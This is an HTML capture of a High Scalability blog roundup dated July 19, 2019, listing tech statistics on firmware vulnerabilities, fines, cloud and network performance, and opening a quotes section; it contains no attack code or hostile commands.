<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">

<head>
  <meta http-equiv="Content-Type" content="text/html; charset=utf-8"/> 
  
   <meta name="Robots" content="index,follow" />  
  
  
  <!-- highscalability -->

  <link rel="shortcut icon" href="/favicon.png" type="image/png" />

  <link id="primaryStylesheet" rel="stylesheet" type="text/css" href="/display/common.css?styleId=512250&amp;RK=1552578797277&amp;CE=75"/>
  
  <link id="slideShowStylesheet" rel="stylesheet" type="text/css" href="/universal/styles/squarespace-gallery-slideshow.css?CE=75"/>
  
  
    <link rel="alternate" type="application/rss+xml" title="RSS" href="http://feeds.feedburner.com/HighScalability" />
  
  
  <!-- Google Web Fonts -->
  <script type="text/javascript">
    	WebFontConfig = {};
  
   
    (function() {
      var wf = document.createElement('script');
      wf.src = ('https:' == document.location.protocol ? 'https' : 'http') +
          '://ajax.googleapis.com/ajax/libs/webfont/1/webfont.js';
      wf.type = 'text/javascript';
      wf.async = 'true';
      var s = document.getElementsByTagName('script')[0];
      s.parentNode.insertBefore(wf, s);
    })();
  </script>

  <script type="text/javascript" src="/universal/yui/yahoo-dom-event/yahoo-dom-event.js?CE=75"></script>
<script type="text/javascript" src="/universal/yui/connection/connection_core-min.js?CE=75"></script>
<script type="text/javascript" src="/universal/yui/json/json-min.js?CE=75"></script>
<script type="text/javascript" src="/universal/yui/animation/animation-min.js?CE=75"></script>
<script type="text/javascript" src="/universal/yui/selector/selector.js?CE=75"></script>
<script type="text/javascript" src="/universal/yui/element/element.js?CE=75"></script>
<script type="text/javascript" src="/universal/scripts/global.js?CE=75"></script>
<script type="text/javascript" src="/universal/scripts/lightbox.js?CE=75"></script>
<script type="text/javascript" src="/universal/scripts/api.js?CE=75"></script>
<script type="text/javascript" src="/universal/scripts/base64.js?CE=75"></script>
<script type="text/javascript" src="/universal/scripts/census.js?CE=75"></script>
<script type="text/javascript" src="/universal/scripts/yui2-yui3-bridge.js?CE=75"></script>
<script type="text/javascript" src="/universal/scripts/squarespace-gallery-slideshow.js?CE=75"></script>


  <script type="text/javascript">
  // <![CDATA[

    Squarespace.Constants.SS_AUTHKEY = encodeURIComponent("");
    Squarespace.Constants.WEBSITE_TITLE =  "High Scalability"; 
    
     Squarespace.Constants.CURRENT_MODULE_ID = "4867632"; 
    
    
    
    Squarespace.Constants.ADMINISTRATION_UI =  false; 
    
    
     Squarespace.Constants.OBJECT_PERMALINK = "http://highscalability.com/blog/2019/7/19/stuff-the-internet-says-on-scalability-for-july-19th-2019.html"; 
    Squarespace.Constants.CORE_APPLICATION_DOMAIN = "squarespace.com";
    Squarespace.Constants.CORE_V6_APPLICATION_DOMAIN = "squarespace.com";
    Squarespace.Constants.V5_FRONTSITE = "http://www.squarespace.com";
    Squarespace.Constants.WEBSITE_ID = "426227";

    

    

    

  // ]]>
  </script>

      <title>Stuff The Internet Says On Scalability For July 19th,&nbsp;2019 - High Scalability - </title>
    <meta property="og:title" content="Stuff The Internet Says On Scalability For July 19th,&nbsp;2019 - High Scalability - " /> 
  

      <meta property="og:description" content=" Wake up! It's HighScalability time&amp;mdash;once again:

 
  

 XKCD 
  

 
 Do you like this sor..." />
  

  
      <meta property="og:image" content="https://imgs.xkcd.com/comics/stack.png" />
  

  <!-- End Heading -->

  

  <script type="text/javascript" src="/universal/scripts/cookie-min.js"></script>
  <script type="text/javascript" src="/universal/scripts/eu-cookie-policy.js"></script>

</head>

<body  id="modulePage4867632"   class="objectId36202663"  >

  <script type="text/javascript">
  YAHOO.util.Event.onDOMReady(function() {
    if (document.location.href.indexOf("SSLogoutOk=true") != -1) {
      new Squarespace.FixedPositionTip("Logout Successful", "You have been successfully logged out.", { xMargin: 15, yMargin: 15, icon: "/universal/images/helptip-info.png", orientation: "upper-right", viewportFixed: true, autoHide: 1800 }).show();
    }
  });
</script>

    

  <script type="text/javascript">
    YAHOO.util.Event.onDOMReady(function() { new Squarespace.Census.hit(); } );
  </script>

  <script type="text/javascript">
    YAHOO.util.Event.addListener(document, "keyup", function (e) { if (!e) { e = event; } if (e.keyCode == 27) { document.location.href = "/login/?returnUrl=%2Fblog%2F2019%2F7%2F19%2Fstuff-the-internet-says-on-scalability-for-july-19th-2019.html%3Futm_source%3Dfeedburner%26utm_medium%3Dfeed%26utm_campaign%3DFeed%3A%20HighScalability%20%28High%20Scalability%29"; } });
  </script>




  

  <div id="canvasWrapper"><div id="canvas">
  
  

  <div id="pageHeaderWrapper"><div id="pageHeader">

      <div id="navigationTop"><div id="navigationTop-sectionContent2191792" class="horizontalNavigationBar"><ul class="content-navigation">
    
  <li class="module active-module  " id="navigationTop-moduleContentWrapper4867632">

    <div id="navigationTop-moduleContent4867632">

              <a id="navigationTop-moduleLink4867632" class=" " href="/" ><span>Home</span></a>
      

      

    </div>

  </li>


  <li class="module   " id="navigationTop-moduleContentWrapper5498762">

    <div id="navigationTop-moduleContent5498762">

              <a id="navigationTop-moduleLink5498762" class="offsite-link " href="https://smile.amazon.com/Explain-Cloud-Like-Im-10-ebook/dp/B0765C4SNR" onclick="this.target='new';"><span>Explain the Cloud Like I&#39;m 10</span></a>
      

      

    </div>

  </li>


  <li class="module   " id="navigationTop-moduleContentWrapper15178301">

    <div id="navigationTop-moduleContent15178301">

              <a id="navigationTop-moduleLink15178301" class=" " href="/all-time-favorites/" ><span>All Time Favorites</span></a>
      

      

    </div>

  </li>


  <li class="module   " id="navigationTop-moduleContentWrapper4850438">

    <div id="navigationTop-moduleContent4850438">

              <a id="navigationTop-moduleLink4850438" class=" " href="/blog/category/example" ><span>Real Life Architectures</span></a>
      

      

    </div>

  </li>


  <li class="module   " id="navigationTop-moduleContentWrapper10576114">

    <div id="navigationTop-moduleContent10576114">

              <a id="navigationTop-moduleLink10576114" class=" " href="http://highscalability.squarespace.com/blog/category/strategy" ><span>Strategies</span></a>
      

      

    </div>

  </li>


  <li class="module   " id="navigationTop-moduleContentWrapper19697312">

    <div id="navigationTop-moduleContent19697312">

              <a id="navigationTop-moduleLink19697312" class="offsite-link " href="https://www.patreon.com/toddhoff" onclick="this.target='new';"><span>Support in Patreon</span></a>
      

      

    </div>

  </li>


  <li class="module   " id="navigationTop-moduleContentWrapper4850431">

    <div id="navigationTop-moduleContent4850431">

              <a id="navigationTop-moduleLink4850431" class=" " href="/advertising/" ><span>Advertising</span></a>
      

      

    </div>

  </li>


  <li class="module   " id="navigationTop-moduleContentWrapper4850400">

    <div id="navigationTop-moduleContent4850400">

              <a id="navigationTop-moduleLink4850400" class=" " href="/start-here/" ><span>Start Here</span></a>
      

      

    </div>

  </li>


  <li class="module   " id="navigationTop-moduleContentWrapper4850388">

    <div id="navigationTop-moduleContent4850388">

              <a id="navigationTop-moduleLink4850388" class=" " href="/contact/" ><span>contact</span></a>
      

      

    </div>

  </li>


  <li class="module   " id="navigationTop-moduleContentWrapper5861345">

    <div id="navigationTop-moduleContent5861345">

              <a id="navigationTop-moduleLink5861345" class=" " href="http://feeds.feedburner.com/HighScalability" ><span>RSS</span></a>
      

      

    </div>

  </li>


  <li class="module   " id="navigationTop-moduleContentWrapper18971493">

    <div id="navigationTop-moduleContent18971493">

              <a id="navigationTop-moduleLink18971493" class=" " href="https://twitter.com/highscal" ><span>Twitter</span></a>
      

      

    </div>

  </li>


  <li class="module   " id="navigationTop-moduleContentWrapper18971509">

    <div id="navigationTop-moduleContent18971509">

              <a id="navigationTop-moduleLink18971509" class=" " href="http://www.facebook.com/pages/Highscalability/441249225918692" ><span>Facebook</span></a>
      

      

    </div>

  </li>


  <li class="module   " id="navigationTop-moduleContentWrapper19028422">

    <div id="navigationTop-moduleContent19028422">

              <a id="navigationTop-moduleLink19028422" class=" " href="https://plus.google.com/b/116966782604206517628/116966782604206517628/posts" ><span>G+</span></a>
      

      

    </div>

  </li>


  <li class="module   " id="navigationTop-moduleContentWrapper4847294">

    <div id="navigationTop-moduleContent4847294">

              <a id="navigationTop-moduleLink4847294" class=" " href="/all-posts/" ><span>All Posts</span></a>
      

      

    </div>

  </li>


  <li class="module   " id="navigationTop-moduleContentWrapper19700860">

    <div id="navigationTop-moduleContent19700860">

              <a id="navigationTop-moduleLink19700860" class="offsite-link " href="https://www.amazon.com/shop/highscal" onclick="this.target='new';"><span>Amazon Store</span></a>
      

      

    </div>

  </li>


  </ul><br class="clearer"/></div></div>

    
        
      
  
      <div id="bannerAreaWrapper"><div id="bannerArea">

        
        <div id="bannerWrapper">
          <a href="http://highscalability.com/"><img id="banner" src="/storage/HSBannerTrebuchet.jpg" alt="High Scalability" title="High Scalability"/></a>
        </div>  

      
      
      </div></div>
    
    
    

      <div id="navigationBottom"><div id="navigationBottom-sectionContent2191792" class="horizontalNavigationBar"><ul class="content-navigation">
    
  <li class="module active-module  " id="navigationBottom-moduleContentWrapper4867632">

    <div id="navigationBottom-moduleContent4867632">

              <a id="navigationBottom-moduleLink4867632" class=" " href="/" ><span>Home</span></a>
      

      

    </div>

  </li>


  <li class="module   " id="navigationBottom-moduleContentWrapper5498762">

    <div id="navigationBottom-moduleContent5498762">

              <a id="navigationBottom-moduleLink5498762" class="offsite-link " href="https://smile.amazon.com/Explain-Cloud-Like-Im-10-ebook/dp/B0765C4SNR" onclick="this.target='new';"><span>Explain the Cloud Like I&#39;m 10</span></a>
      

      

    </div>

  </li>


  <li class="module   " id="navigationBottom-moduleContentWrapper15178301">

    <div id="navigationBottom-moduleContent15178301">

              <a id="navigationBottom-moduleLink15178301" class=" " href="/all-time-favorites/" ><span>All Time Favorites</span></a>
      

      

    </div>

  </li>


  <li class="module   " id="navigationBottom-moduleContentWrapper4850438">

    <div id="navigationBottom-moduleContent4850438">

              <a id="navigationBottom-moduleLink4850438" class=" " href="/blog/category/example" ><span>Real Life Architectures</span></a>
      

      

    </div>

  </li>


  <li class="module   " id="navigationBottom-moduleContentWrapper10576114">

    <div id="navigationBottom-moduleContent10576114">

              <a id="navigationBottom-moduleLink10576114" class=" " href="http://highscalability.squarespace.com/blog/category/strategy" ><span>Strategies</span></a>
      

      

    </div>

  </li>


  <li class="module   " id="navigationBottom-moduleContentWrapper19697312">

    <div id="navigationBottom-moduleContent19697312">

              <a id="navigationBottom-moduleLink19697312" class="offsite-link " href="https://www.patreon.com/toddhoff" onclick="this.target='new';"><span>Support in Patreon</span></a>
      

      

    </div>

  </li>


  <li class="module   " id="navigationBottom-moduleContentWrapper4850431">

    <div id="navigationBottom-moduleContent4850431">

              <a id="navigationBottom-moduleLink4850431" class=" " href="/advertising/" ><span>Advertising</span></a>
      

      

    </div>

  </li>


  <li class="module   " id="navigationBottom-moduleContentWrapper4850400">

    <div id="navigationBottom-moduleContent4850400">

              <a id="navigationBottom-moduleLink4850400" class=" " href="/start-here/" ><span>Start Here</span></a>
      

      

    </div>

  </li>


  <li class="module   " id="navigationBottom-moduleContentWrapper4850388">

    <div id="navigationBottom-moduleContent4850388">

              <a id="navigationBottom-moduleLink4850388" class=" " href="/contact/" ><span>contact</span></a>
      

      

    </div>

  </li>


  <li class="module   " id="navigationBottom-moduleContentWrapper5861345">

    <div id="navigationBottom-moduleContent5861345">

              <a id="navigationBottom-moduleLink5861345" class=" " href="http://feeds.feedburner.com/HighScalability" ><span>RSS</span></a>
      

      

    </div>

  </li>


  <li class="module   " id="navigationBottom-moduleContentWrapper18971493">

    <div id="navigationBottom-moduleContent18971493">

              <a id="navigationBottom-moduleLink18971493" class=" " href="https://twitter.com/highscal" ><span>Twitter</span></a>
      

      

    </div>

  </li>


  <li class="module   " id="navigationBottom-moduleContentWrapper18971509">

    <div id="navigationBottom-moduleContent18971509">

              <a id="navigationBottom-moduleLink18971509" class=" " href="http://www.facebook.com/pages/Highscalability/441249225918692" ><span>Facebook</span></a>
      

      

    </div>

  </li>


  <li class="module   " id="navigationBottom-moduleContentWrapper19028422">

    <div id="navigationBottom-moduleContent19028422">

              <a id="navigationBottom-moduleLink19028422" class=" " href="https://plus.google.com/b/116966782604206517628/116966782604206517628/posts" ><span>G+</span></a>
      

      

    </div>

  </li>


  <li class="module   " id="navigationBottom-moduleContentWrapper4847294">

    <div id="navigationBottom-moduleContent4847294">

              <a id="navigationBottom-moduleLink4847294" class=" " href="/all-posts/" ><span>All Posts</span></a>
      

      

    </div>

  </li>


  <li class="module   " id="navigationBottom-moduleContentWrapper19700860">

    <div id="navigationBottom-moduleContent19700860">

              <a id="navigationBottom-moduleLink19700860" class="offsite-link " href="https://www.amazon.com/shop/highscal" onclick="this.target='new';"><span>Amazon Store</span></a>
      

      

    </div>

  </li>


  </ul><br class="clearer"/></div></div>


  </div></div>
  
  

  

  
  <div id="pageBodyWrapper"><div id="pageBody">
  
  <div id="sidebar1Wrapper" class="verticalNavigationBarWrapper"><div class="iw-vnb1"><div class="iw-vnb2"><div class="iw-vnb3"><div class="iw-vnb4"><div id="sidebar1" class="verticalNavigationBar">

  

    <div id="sectionContent2251797" class="sectionWrapper  "><div class="iw-s1"><div class="iw-s2"><div class="iw-s3"><div class="iw-s4"><div class="section">

      

      
        
          <div class="content-passthrough"><div id="moduleContentWrapper4876569" class="widget-wrapper  widget-type-search"><div id="moduleContent4876569">


<!-- <form method="get" action="/display/Search">
	<div class="search-form-pt-wrapper">
	  <div class="search-form-pt">
	    <span class="queryFieldWrapper"><input type="text" class="text queryField" name="searchQuery" value=""/></span>
	    <span class="queryButtonWrapper"><input type="submit" class="button queryButton" value="&raquo;"/></span>
	    <input type="hidden" name="moduleId" value="4876569"/>
	    <br class="clearer"/>
	  </div>
	</div>
</form> -->

<form method="get" action="/display/Search">
	<input type="hidden" name="moduleId" value="4876569"/>
	<table class="search-form-pt-wrapper search-form-table" border="0" cellpadding="0" cellspacing="0">
		<tr class="search-form-pt search-form-row">
			<td class="queryFieldCell search-form-cell">
				<span class="queryFieldWrapper">
					<input type="text" class="text queryField" name="searchQuery" value=""/>
				</span>
			</td>
			<td class="queryButtonCell search-form-cell">
				<span class="queryButtonWrapper">
					<input type="submit" class="button queryButton" value="&rarr;"/>
				</span>
			</td>
		</tr>
	</table> 
</form></div></div></div>

        

      
  
    </div></div></div></div></div></div>

  

    <div id="sectionContent2191792" class="sectionWrapper promotedContainer "><div class="iw-s1"><div class="iw-s2"><div class="iw-s3"><div class="iw-s4"><div class="section">

       <div class="caption">Top</div> 

      
        
          <ul class="content-navigation">
  <li class="module active-module  " id="moduleContentWrapper4867632">

    <div id="moduleContent4867632">

              <a id="moduleLink4867632" class=" " href="/" ><span>Home</span></a>
      

      

    </div>

  </li>


  <li class="module   " id="moduleContentWrapper5498762">

    <div id="moduleContent5498762">

              <a id="moduleLink5498762" class="offsite-link " href="https://smile.amazon.com/Explain-Cloud-Like-Im-10-ebook/dp/B0765C4SNR" onclick="this.target='new';"><span>Explain the Cloud Like I&#39;m 10</span></a>
      

      

    </div>

  </li>


  <li class="module   " id="moduleContentWrapper15178301">

    <div id="moduleContent15178301">

              <a id="moduleLink15178301" class=" " href="/all-time-favorites/" ><span>All Time Favorites</span></a>
      

      

    </div>

  </li>


  <li class="module   " id="moduleContentWrapper4850438">

    <div id="moduleContent4850438">

              <a id="moduleLink4850438" class=" " href="/blog/category/example" ><span>Real Life Architectures</span></a>
      

      

    </div>

  </li>


  <li class="module   " id="moduleContentWrapper10576114">

    <div id="moduleContent10576114">

              <a id="moduleLink10576114" class=" " href="http://highscalability.squarespace.com/blog/category/strategy" ><span>Strategies</span></a>
      

      

    </div>

  </li>


  <li class="module   " id="moduleContentWrapper19697312">

    <div id="moduleContent19697312">

              <a id="moduleLink19697312" class="offsite-link " href="https://www.patreon.com/toddhoff" onclick="this.target='new';"><span>Support in Patreon</span></a>
      

      

    </div>

  </li>


  <li class="module   " id="moduleContentWrapper4850431">

    <div id="moduleContent4850431">

              <a id="moduleLink4850431" class=" " href="/advertising/" ><span>Advertising</span></a>
      

      

    </div>

  </li>


  <li class="module   " id="moduleContentWrapper4850400">

    <div id="moduleContent4850400">

              <a id="moduleLink4850400" class=" " href="/start-here/" ><span>Start Here</span></a>
      

      

    </div>

  </li>


  <li class="module   " id="moduleContentWrapper4850388">

    <div id="moduleContent4850388">

              <a id="moduleLink4850388" class=" " href="/contact/" ><span>contact</span></a>
      

      

    </div>

  </li>


  <li class="module   " id="moduleContentWrapper5861345">

    <div id="moduleContent5861345">

              <a id="moduleLink5861345" class=" " href="http://feeds.feedburner.com/HighScalability" ><span>RSS</span></a>
      

      

    </div>

  </li>


  <li class="module   " id="moduleContentWrapper18971493">

    <div id="moduleContent18971493">

              <a id="moduleLink18971493" class=" " href="https://twitter.com/highscal" ><span>Twitter</span></a>
      

      

    </div>

  </li>


  <li class="module   " id="moduleContentWrapper18971509">

    <div id="moduleContent18971509">

              <a id="moduleLink18971509" class=" " href="http://www.facebook.com/pages/Highscalability/441249225918692" ><span>Facebook</span></a>
      

      

    </div>

  </li>


  <li class="module   " id="moduleContentWrapper19028422">

    <div id="moduleContent19028422">

              <a id="moduleLink19028422" class=" " href="https://plus.google.com/b/116966782604206517628/116966782604206517628/posts" ><span>G+</span></a>
      

      

    </div>

  </li>


  <li class="module   " id="moduleContentWrapper4847294">

    <div id="moduleContent4847294">

              <a id="moduleLink4847294" class=" " href="/all-posts/" ><span>All Posts</span></a>
      

      

    </div>

  </li>


  <li class="module   " id="moduleContentWrapper19700860">

    <div id="moduleContent19700860">

              <a id="moduleLink19700860" class="offsite-link " href="https://www.amazon.com/shop/highscal" onclick="this.target='new';"><span>Amazon Store</span></a>
      

      

    </div>

  </li>

</ul>

        

      
  
    </div></div></div></div></div></div>

  

    <div id="sectionContent2248744" class="sectionWrapper  "><div class="iw-s1"><div class="iw-s2"><div class="iw-s3"><div class="iw-s4"><div class="section">

       <div class="caption">Recent Posts</div> 

      
        
          <div class="content-passthrough"><div id="moduleContentWrapper4867742" class="widget-wrapper  widget-type-journalarchive"><div id="moduleContent4867742">







  <ul class="archive-item-list-pt">
     <li><a href="/blog/2019/7/19/sponsored-post-educative-pa-file-sight-etleap-perfops-inmemo.html">Sponsored Post: Educative, PA File Sight, Etleap, PerfOps, InMemory.Net, Triplebyte, Stream, Scalyr</a></li>  <li><a href="/blog/2019/7/19/stuff-the-internet-says-on-scalability-for-july-19th-2019.html">Stuff The Internet Says On Scalability For July 19th, 2019</a></li>  <li><a href="/blog/2019/7/10/sponsored-post-pa-file-sight-etleap-perfops-inmemorynet-trip.html">Sponsored Post: PA File Sight, Etleap, PerfOps, InMemory.Net, Triplebyte, Stream, Scalyr</a></li>  <li><a href="/blog/2019/6/27/sponsored-post-pa-file-sight-etleap-perfops-inmemorynet-trip.html">Sponsored Post: PA File Sight, Etleap, PerfOps, InMemory.Net, Triplebyte, Stream, Scalyr</a></li>  <li><a href="/blog/2019/6/27/2019-open-source-database-report-top-databases-public-cloud.html">2019 Open Source Database Report: Top Databases, Public Cloud vs. On-Premise, Polyglot Persistence</a></li>  <li><a href="/blog/2019/6/4/sponsored-post-etleap-perfops-inmemorynet-triplebyte-stream.html">Sponsored Post: Etleap, PerfOps, InMemory.Net, Triplebyte, Stream, Scalyr</a></li>  <li><a href="/blog/2019/5/17/gone-fishin.html">Gone Fishin'</a></li>  <li><a href="/blog/2019/5/14/sponsored-post-perfops-inmemorynet-triplebyte-etleap-stream.html">Sponsored Post: PerfOps, InMemory.Net, Triplebyte, Etleap, Stream, Scalyr</a></li>  <li><a href="/blog/2019/5/10/stuff-the-internet-says-on-scalability-for-may-10th-2019.html">Stuff The Internet Says On Scalability For May 10th, 2019</a></li>  <li><a href="/blog/2019/5/3/stuff-the-internet-says-on-scalability-for-may-3rd-2019.html">Stuff The Internet Says On Scalability For May 3rd, 2019</a></li> 
  </ul>



</div></div></div>

        

      
  
    </div></div></div></div></div></div>

  

  

</div></div></div></div></div></div>
  <div id="sidebar2Wrapper" class="verticalNavigationBarWrapper"><div class="iw-vnb1"><div class="iw-vnb2"><div class="iw-vnb3"><div class="iw-vnb4"><div id="sidebar2" class="verticalNavigationBar">

  

    <div id="sectionContent2249261" class="sectionWrapper  "><div class="iw-s1"><div class="iw-s2"><div class="iw-s3"><div class="iw-s4"><div class="section">

      

      
        
          <div class="content-passthrough"><div id="moduleContentWrapper4869210" class="widget-wrapper  widget-type-page"><div id="moduleContent4869210">





  <center>
  
  <a href="https://www.educative.io/collection/5668639101419520/5649050225344512 ">
     <img src="/storage/grokking-sdi-highscalability.png">
  </a>
  
  <a href="https://www.poweradmin.com/products/file-sight/product-information/landing/?ref=highscalability&utm_source=highscalability">
     <img src="/storage/file-sight-ransomware-protection.png">
  </a>
  
  <a href="https://fauna.com?utm_medium=referral&utm_source=HighScalabilityBlog">
     <img src="/storage/FaunaDB_125x12505x.png">
  </a>
  
  <a href="https://perfops.net?utm_source=highscalability&utm_medium=banner_125_125&utm_campaign=global_flexible_load_balancers">
     <img src="/storage/125x125-2.png">
  </a>
  
  <a href="https://getstream.io/chat/">
     <img width="125" height="125" src="/storage/stream.png">
  </a>
  
  <a href="https://triplebyte.com/?ref=hs_apr18_c1">
    <img src="/storage/triplebyte125.png">
  </a>
  
  
  <a href="/advertising">advertise</A>
  </center>
</div></div></div>

        

      
  
    </div></div></div></div></div></div>

  

    <div id="sectionContent2191793" class="sectionWrapper  "><div class="iw-s1"><div class="iw-s2"><div class="iw-s3"><div class="iw-s4"><div class="section">

      

      
        
          <ul class="content-navigation">
  <li class="module   " id="moduleContentWrapper4708561">

    <div id="moduleContent4708561">

              <a id="moduleLink4708561" class=" " href="/login/?returnUrl=%2Fblog%2F2019%2F7%2F19%2Fstuff-the-internet-says-on-scalability-for-july-19th-2019.html%3Futm_source%3Dfeedburner%26utm_medium%3Dfeed%26utm_campaign%3DFeed%3A%20HighScalability%20%28High%20Scalability%29" ><span>Login</span></a>
      

      

    </div>

  </li>


  <li class="module   " id="moduleContentWrapper4869034">

    <div id="moduleContent4869034">

              <a id="moduleLink4869034" class=" " href="/register/" ><span>Register</span></a>
      

      

    </div>

  </li>

</ul>

        

      
  
    </div></div></div></div></div></div>

  

    <div id="sectionContent2248734" class="sectionWrapper  "><div class="iw-s1"><div class="iw-s2"><div class="iw-s3"><div class="iw-s4"><div class="section">

      

      
        
          <div class="content-passthrough"><div id="moduleContentWrapper4867711" class="widget-wrapper  widget-type-rss-syndicate"><div id="moduleContent4867711">



  <ul class="feed-list-inline">
    
          <li><a href="http://feeds.feedburner.com/HighScalability" class="feed-link">High Scalability RSS</a></li>
        
          <li><a href="http://highscalability.com/blog/rss-comments.xml" class="feed-link">High Scalability Comments RSS</a></li>
        
  </ul>

</div></div></div>

        

      
  
    </div></div></div></div></div></div>

  

  

</div></div></div></div></div></div>
  
  

  <div id="contentWrapper"><div id="content">
    
          
    


  

  
  
      
  <div class="journal-entry-navigation">

    
       <a class="journal-entry-navigation-prev" href="/blog/2019/7/19/sponsored-post-educative-pa-file-sight-etleap-perfops-inmemo.html">&laquo; Sponsored Post: Educative, PA File Sight, Etleap, PerfOps, InMemory.Net, Triplebyte, Stream, Scalyr</a> | 
      <a class="journal-entry-navigation-main" href="/blog/">Main</a>
       | <a class="journal-entry-navigation-next" href="/blog/2019/7/10/sponsored-post-pa-file-sight-etleap-perfops-inmemorynet-trip.html">Sponsored Post: PA File Sight, Etleap, PerfOps, InMemory.Net, Triplebyte, Stream, Scalyr &raquo;</a> 

    

  </div>


  
  
  <div class="single-journal-entry-wrapper">
    


<div class="journal-entry-wrapper post-text authored-by-highscalability category-hot-links">
<div id="item36202663" class="journal-entry">

  <div class="journal-entry-float-day"><span class="name">Friday</span></div><div class="journal-entry-float-date"><span class="month">Jul</span><span class="date">19</span><span class="year">2019</span></div>
  
  
  
  <div class="journal-entry-text">
  
      
      <h2 class="title">
    
        
    
        <a class="journal-entry-navigation-current" href="/blog/2019/7/19/stuff-the-internet-says-on-scalability-for-july-19th-2019.html">Stuff The Internet Says On Scalability For July 19th,&nbsp;2019</a>  
     
         
    
      </h2>
      
       <div class="journal-entry-tag journal-entry-tag-post-title"><span class="posted-on">   <img title="Date" alt="Date" class="inline-icon date-icon" rel="smalllight" src="/universal/images/transparent.png" />Friday, July 19, 2019 at 9:01AM</span> </div> 

    
  
      
      <div class="body">
  
        
        
        
          <p>Wake up! It's HighScalability time&mdash;once again:</p>
<div align="center"><img src="https://imgs.xkcd.com/comics/stack.png" alt="" />
<p>&nbsp;</p>
<a href="https://xkcd.com/2166/"> XKCD</a>
<p>&nbsp;</p>
</div>
<p style="text-align: center;">Do you like this sort of Stuff? I'd greatly appreciate your <a href="https://www.patreon.com/toddhoff">support on Patreon</a>. I wrote <a href="https://www.amazon.com/dp/B0765C4SNR">Explain the Cloud Like I'm 10</a>&nbsp;for people who need to understand the cloud. And who doesn't these days? On Amazon it has 52 mostly 5 star reviews (118 on Goodreads). They'll learn a lot and hold you in even greater awe.</p>
<p>&nbsp;</p>
<h2>Number Stuff:</h2>
<ul>
<li><a href="https://finitestate.io/wp-content/uploads/2019/06/Finite-State-SCA1-Final.pdf">55%</a>:&nbsp;Huawei devices have a potential backdoor. One device had 1,419 known vulnerabilities. On average&nbsp;Huawei devices had 102 known vulnerabilities inside their firmware. 8 different firmware images were found to have pre-computed authorized_keys hard coded into the firmware. 424 different firmware images contained hardcoded private SSH keys. On dozens of occasions, Huawei engineers disguised known unsafe functions (such as memcpy) as the &ldquo;safe&rdquo; version (memcpy_s).</li>
<li><a href="https://www.youtube.com/watch?v=G_dwZB5h56E">333</a>: slides in Mary Meeker's 2019 Internet Trends report.</li>
<li><a href="https://www.usenix.org/conference/atc19/presentation/jangda">55%</a>: performance hit for applications compiled to WebAssembly.</li>
<li><a href="https://www.researchandmarkets.com/reports/4791017/artificial-intelligence-industrial-iot-and">$4.6B</a>: global market for eEmbedded AI in support of IIoT smart objects by 2024.</li>
<li><a href="https://msrc-blog.microsoft.com/2019/07/16/a-proactive-approach-to-more-secure-code/">~70%</a>: Microsoft vulnerabilities are caused by C and C++ memory corruption bugs.&nbsp;</li>
<li><a href="https://thehustle.co/biggest-sweepstakes-winners/">$20</a>: worth of one branded retweet.</li>
<li><a href="https://www.wsj.com/articles/ftc-approves-roughly-5-billion-facebook-settlement-11562960538">$5B</a>: Facebook fine for "privacy missteps".</li>
<li><a href="https://www.bbc.com/news/business-48905907">&pound;183m</a>: British Airways fine for data breach.</li>
<li><a href="https://www.ibtimes.com/nasa-asteroid-news-stunning-video-shows-14000-asteroids-orbiting-earths-solar-system-2804406">14,000</a>:&nbsp;asteroids orbiting in the Solar System.&nbsp;</li>
<li><a href="https://cloud.google.com/blog/products/infrastructure/introducing-equiano-a-subsea-cable-from-portugal-to-south-africa">14th</a>: Google's subsea cable from&nbsp;Portugal to South Africa.</li>
<li><a href="https://www.anandtech.com/show/14596/toshiba-western-digital-nand-production-partially-halted-by-power-outage">13-minute</a>: power outage caused the loss of&nbsp;6 EB (exabytes) of NAND flash.</li>
<li><a href="https://www.nytimes.com/2019/06/19/us/florida-riviera-beach-hacking-ransom.html">$600k</a>: take from ransomware attack on Florida city.</li>
<li><a href="https://www.youtube.com/watch?v=EQ336PTZfhU">100 billion</a>: documents at Slack.</li>
<li><a href="https://www.marketwatch.com/story/hr-block-intuit-shares-gain-ground-after-irs-confirms-refunds-will-be-paid-despite-shutdown-2019-01-08">1.9M</a>: tax returns processed by the IRS in one hour.&nbsp;</li>
<li><a href="https://www.theregister.co.uk/2019/06/24/verizon_bgp_misconfiguration_cloudflare/">2%</a>: of the internet was&nbsp;mistakenly routed through a Pittsburgh, Pennsylvania steel mill because of a BGP error.&nbsp;</li>
<li><a href="https://www.thisiscolossal.com/2019/06/nasa-image-library/">140,000</a>: visuals of outer space are free to the public in @NASA's image library.</li>
<li><a href="https://www.inc.com/don-reisinger/5-major-takeaways-from-2019-mary-meeker-internet-trends-report.html">6.3</a>: hours per day spent on the internet by the average US person.</li>
<li><a href="https://medium.com/utopiapress/internet-trends-2019-mary-meeker-report-bd70d202c845">40%</a>:&nbsp;young people are online pretty much constantly.</li>
<li><a href="https://www.businessinsider.com/mary-meeker-2019-internet-trends-report-2019-6#-8">3.8B</a>: Global internet users.</li>
<li><a href="https://www.ebayinc.com/stories/blogs/tech/monitoring-at-ebay-with-druid/">8 million</a>: events per second generated by the eBay fleet from more than 5,000+ applications.&nbsp;</li>
<li><a href="https://eng.uber.com/employing-quic-protocol/">10-30%</a>: reduction&nbsp;in Uber's HTTPS tail-end latencies after adopting UDP based QUIC.</li>
<li><a href="https://www.techspot.com/article/1850-how-screwed-is-intel-no-hyper-threading/">25-35%</a>: reduction in performance with hyperthreading disabled on Intel&rsquo;s 4 and 6-core CPUs</li>
</ul>
<h2>Quotable Stuff:</h2>
<ul>
<li>
<div id="_mcePaste"><a href="https://www.edge.org/conversation/alison_gopnik-a-separate-kind-of-intelligence">Alison Gopnik</a>: So, you start out with a system that&rsquo;s very plastic but not very efficient, and that turns into a system that&rsquo;s very efficient and not very plastic and flexible. It&rsquo;s interesting that that isn&rsquo;t an architecture that&rsquo;s typically been used in AI. But it&rsquo;s an architecture that biology seems to use over and over again to implement intelligent systems.&nbsp;A good way of thinking about this strategy may be that it&rsquo;s a way of resolving the explore-exploit tradeoffs that you see all the time in AI.&nbsp;</div>
</li>
<li><a href="https://twitter.com/teriradichel/status/1149314087022727168">@TeriRadichel</a>:&nbsp;Liberty Mutual moved call center to AWS Serverless ~ 97% savings</li>
